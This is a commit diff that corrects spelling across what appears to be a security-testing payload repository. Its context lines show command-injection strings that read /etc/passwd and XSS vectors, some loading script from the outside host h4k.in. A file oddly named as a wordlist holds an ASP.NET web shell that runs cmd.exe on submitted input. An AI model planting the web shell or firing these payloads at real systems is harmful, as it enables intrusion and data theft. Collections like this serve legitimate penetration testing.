Verify spelling fixes pass check-spelling

Author: jsoref

attack/file-upload/README.md

@@ -4,7 +4,7 @@ see:  http://cwe.mitre.org/data/definitions/434.html
 
 * kinds of file upload verifications:
  * content-type
- * filename extension verificationi (whitelist, blacklist)
+ * filename extension verification (whitelist, blacklist)
  * file content checking
  * client side, ha ha ha
 

attack/http-protocol/hpp.txt

@@ -1,4 +1,4 @@
-# HTTP paramter polution and interpretation payloads by Jacco van Tuijl
+# HTTP parameter pollution and interpretation payloads by Jacco van Tuijl
 ?id=id=1
 &id=1?id=2
 ?id['&id=1']=2

attack/os-cmd-execution/README.md

@@ -30,14 +30,14 @@ Example IFS netcat backdoor without spaces:<br>
 
 $IFS shell variable:<br>
 ``` cat$IFS/etc/passwd ```<br>
-increment the first +1 to retreive the entire file, line by line<br>
+increment the first +1 to retrieve the entire file, line by line<br>
 ``` cat$IFS/etc/passwd|tail$IFS-n+1|head$IFS-n+1 ```
 
 Shell Variables:<br>
 ``` CMD=$'cat\x20/etc/passwd';$CMD ```
 
 shell variable, increment through file one line at a time: <br>
-increment the first +1 to retreive the entire file, line by line<br>
+increment the first +1 to retrieve the entire file, line by line<br>
 ``` SP=$'\x20';cat$SP/etc/passwd|tail$SP-n+1|head$SP-n+1 ```
 
 **Exfiltrating Files / Data**

attack/sql-injection/exploit/README.md

@@ -11,7 +11,7 @@ various useful post-exploitation commands
 **mysql-injection-login-bypass.fuzz.txt**
 * regex replace as many as you can with your fuzzer for best results:
 * <user-fieldname> <pass-fieldname> <username> 
-* also try to brute force a list of possible usernames, including possile admin acct names
+* also try to brute force a list of possible usernames, including possible admin acct names
 
 **mysql-read-local-files.fuzz.txt**
 * mysql local file disclosure through sqli

attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt

@@ -427,7 +427,7 @@ Author Name: ha.ckers.org
 Extraneous Open Brackets
 Exploit Name: Extraneous Open Brackets
 Exploit String: <<SCRIPT>alert("XSS");//<</SCRIPT>
-Exploit Description: (Submitted by Franz Sedlmaier http://www.pilorz.net/).  This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course).  The double slash comments out the ending extraneous bracket to supress a JavaScript error.
+Exploit Description: (Submitted by Franz Sedlmaier http://www.pilorz.net/).  This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorithm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course).  The double slash comments out the ending extraneous bracket to suppress a JavaScript error.
 Exploit Tags: general, obfuscated
 Author Name: ha.ckers.org
 
@@ -518,8 +518,8 @@ Exploit Description: HTML entities (the semicolons are required for this to work
 Exploit Tags: general, evil tags, obfuscated, internet explorer
 Author Name: ha.ckers.org
 
-HTML Quoute & Comment breaker
-Exploit Name: HTML Quoute & Comment breaker
+HTML Quote & Comment breaker
+Exploit Name: HTML Quote & Comment breaker
 Exploit String: '';!--"<script>alert(0);</script>=&{(alert(1))}
 Exploit Description: This vector breaks HTML quotes and comments.
 Exploit Tags: general, html breaking, comment breaking
@@ -547,7 +547,7 @@ Author Name: .mario
 IE closing-tag expression injection
 Exploit Name: IE closing-tag expression injection
 Exploit String: </a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">
-Exploit Description: This vector exploits a bug in IE whre attributes in closing comments are evaluated.
+Exploit Description: This vector exploits a bug in IE where attributes in closing comments are evaluated.
 Exploit Tags: general, injection, internet explorer
 Author Name: .mario
 
@@ -581,7 +581,7 @@ Exploit String: a=<a>
 </b>
 </a>
 document.write(unescape(a..b))
-Exploit Description: This vector writes an erroneous image tag with onerror hanlder inside an E4X construct into the document context.
+Exploit Description: This vector writes an erroneous image tag with onerror handler inside an E4X construct into the document context.
 Exploit Tags: general, obfuscated, gecko, XML predicates, evil tags
 Author Name: .mario
 
@@ -865,7 +865,7 @@ Author Name: ha.ckers.org
 Mozilla -moz-binding-url injection
 Exploit Name: Mozilla -moz-binding-url injection
 Exploit String:  style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="
-Exploit Description: The vector incudes a binding file via injected style attrbute. Gecko only.
+Exploit Description: The vector incudes a binding file via injected style attribute. Gecko only.
 Exploit Tags: general, injection, gecko, style injection, XBL
 Author Name: .mario
 
@@ -876,8 +876,8 @@ Exploit Description: This vector was once used on a major site to evade a stripp
 Exploit Tags: general, injection, gecko, style injection, XBL
 Author Name: PHPIDS Group
 
-Multiline selfcontained XSS
-Exploit Name: Multiline selfcontained XSS
+Multiline self-contained XSS
+Exploit Name: Multiline self-contained XSS
 Exploit String: _
 =
 eval
@@ -1274,7 +1274,7 @@ Author Name: PHPIDS Group
 Self-contained XSS variant 2
 Exploit Name: Self-contained XSS variant 2
 Exploit String: a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n.h'+'ash.sub'||0;b+=0||'str(1)';c=b[a];c(c(b))
-Exploit Description: Concatenates fragmented functions to evakuate the location hash
+Exploit Description: Concatenates fragmented functions to evaluate the location hash
 Exploit Tags: general, self contained
 Author Name: PHPIDS Group
 
@@ -1366,7 +1366,7 @@ content: “\61\6c\65\72\74\28\31\29″
 eval(eval(document.styleSheets[0].cssRules[0].style.content))
 </script>
 Exploit Description: This vector utilizes the CSS content property and fetches it off the document.styleSheets property afterwards. For correct execution of the payload a double-eval is needed.
-Exploit Tags: general, onfuscated, style injection
+Exploit Tags: general, obfuscated, style injection
 Author Name: .mario
 
 STYLE w/Anonymous HTML

discovery/WebSocket/WebSocket-subprotocols.txt

@@ -1,12 +1,12 @@
 # this list can be used to enumerate supported Web Socket sub protocols of a web socket server
-# It conyains the official IANA registerd Web Socket sub protocols
+# It contains the official IANA registered Web Socket sub protocols
 # Source: https://www.iana.org/assignments/websocket/websocket.xml
 # Example subprotocol request header:
 # Sec-WebSocket-Protocol: mqtt, wamp
 # The Web Socket client can include a list of the protocols when making the initial HTTP request. 
 # The server is then required to either select one of those protocols and include it in a response header.
 # If none of the sub protocols send by the client are supported by the server, 
-# the server shoud fail the handshake and terminate the connection.
+# the server should fail the handshake and terminate the connection.
 MBWS.huawei.com
 MBLWS.huawei.com
 soap

docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html

@@ -89,7 +89,7 @@
 
 Fuzzing includes a lot of testing. You could spend hours and hours modifying and compiling and running the same but slightly
 different code over and over just to get the better results. Planning, preparation, and testing are a part of fuzzing, and
-laboring hours on end for the humble task of perfection, stability, and reproduceability can thankfully be very rewarding.
+laboring hours on end for the humble task of perfection, stability, and reproducibility can thankfully be very rewarding.
 
 Fuzzing is useful because...
 
@@ -569,7 +569,7 @@
 3.2 Writing the Fuzzer
 
 This example for SFTP fuzzing will be written in PERL and will be using libssh2/Net::SSH2 (this is not the only way to use
-and fuzz SFTP, other libaries and extensions that may be more extensive and/or low-level are available).
+and fuzz SFTP, other libraries and extensions that may be more extensive and/or low-level are available).
 
 [sftpfuzz.pl]
 

docs/misc/KL0209LIT_fffap.html

@@ -5,7 +5,7 @@ Information Security
 Information Warfare
 IW
 IS
-Priavacy Information 
+Privacy Information 
 Terrorism
 Defensive
 Information Defense
@@ -36,7 +36,7 @@ CIA
 S/Key
 SSL
 FBI
-Secert Service
+Secret Service
 USSS
 Defcon
 Military
@@ -212,7 +212,7 @@ MI6
 Kh-11
 Shayet-13
 SADMS
-Spetznaz
+Spetsnaz
 Recce
 707
 CIO
@@ -663,7 +663,7 @@ COS
 E.T.
 credit card fraud
 b9
-assasinate
+assassinate
 virus
 anarchy
 rogue
@@ -1008,6 +1008,6 @@ China
 Conficker
 Worm
 Scammers
-Suspecious
+Suspicious
 Social media
 

regex/nsa-wordlist.txt

@@ -5,7 +5,7 @@
 void Page_Load(object sender, EventArgs e)
 {
 }
-string ExcuteCmd(string arg)
+string ExecuteCmd(string arg)
 {
 ProcessStartInfo psi = new ProcessStartInfo();
 psi.FileName = "cmd.exe";
@@ -21,7 +21,7 @@ return s;
 void cmdExe_Click(object sender, System.EventArgs e)
 {
 Response.Write("<pre>");
-Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
+Response.Write(Server.HtmlEncode(ExecuteCmd(txtArg.Text)));
 Response.Write("</pre>");
 }
 </script>
@@ -32,7 +32,7 @@ Response.Write("</pre>");
 <body >
 <form id="cmd" method="post" runat="server">
 <asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
-<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
+<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="execute" OnClick="cmdExe_Click"></asp:Button>
 <asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
 </form>
 </body>